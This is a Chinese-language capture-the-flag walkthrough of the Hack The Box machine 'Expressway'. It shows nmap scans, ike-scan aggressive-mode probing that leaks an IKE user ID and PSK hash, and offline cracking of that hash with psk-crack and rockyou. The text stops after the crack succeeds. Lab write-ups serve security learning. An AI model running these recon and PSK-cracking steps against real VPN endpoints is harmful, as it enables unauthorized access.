信息收集
nmap 10.129.238.52
Nmap scan report for expressway.htb (10.129.238.52)
Host is up (0.30s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
只开放一个 22 端口,没有获取其他信息。且 openssh 版本很高。
sudo nmap -sU 10.129.238.52
Nmap scan report for 10.129.238.52
Host is up (0.13s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
20313/udp open|filtered unknown
27015/udp open|filtered halflife
35777/udp open|filtered unknown
55544/udp open|filtered unknown
500 端口开启了一个 UDP 服务的 ISAKMP。
ike-scan -A 10.129.238.52
10.129.238.52 Aggressive Mode Handshake returned HDR=(CKY-R=acc21ad3257774c3) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, [email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
发现一个 [email protected]。
将 10.129.238.52 expressway.htb 加入到 /etc/hosts。
ike-scan -P -M -A -n fakeID 10.129.238.52
10.129.238.52 Aggressive Mode Handshake returned HDR=(CKY-R=b2bf75e8f8aaefe5) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, [email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r): ...
拿到 hash 值可以利用配套的 psk-crack 进行 hash 解密。
echo '3e793795560327851aff89e01824997613223fc0d107fc328c91f53856e0accfc3d4d358b2a136fe597d70d4a5600c2eb83c5cc57600d19e77ab61fd5fae55833b0c918789f17fa87c54644270caf85868d092d0370087b33926a11be6c860d612e268e395f2389578b3869706cf4561f17a87e723d89dee10995e69e7520858:4cbeb43dbd436199ec9aa35c15324dcf035520141daf86ad4870afd17e5ead150d5fcfef97a477115ce7b9ff7d12bf99ddfaca659bfc21f7cdd3b7ddc54b7c30534c4c98dfbc73b13e5c018e0841adb4c7cbc9ef1fbf74b198ed63e402760bd02b02a3c7063780b7097402a6126029d1c4a08303d901e8d96008b56c4522be63:b2bf75e8f8aaefe5:99026807e4a02ac3:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:20d544a13c6e7b9fc2e141c6aa51b149af2e3d70:141674c019572ee01fb468bda80445a3455ab0544943bcf279c5d1a4e07d2bbd:b9b5e8c2d7e9a56ed1e4bf5490ab0ad8dcd8171c' >
psk-crack -d /usr/share/wordlists/rockyou.txt
Starting psk-crack [ike-scan 1.9.6] Running dictionary cracking mode
key matches SHA1 0ccb90ae7420110544da4040192501fdaa42188a
Ending psk-crack: 8045040 iterations 5.821 seconds (1382017.44 iterations/sec)
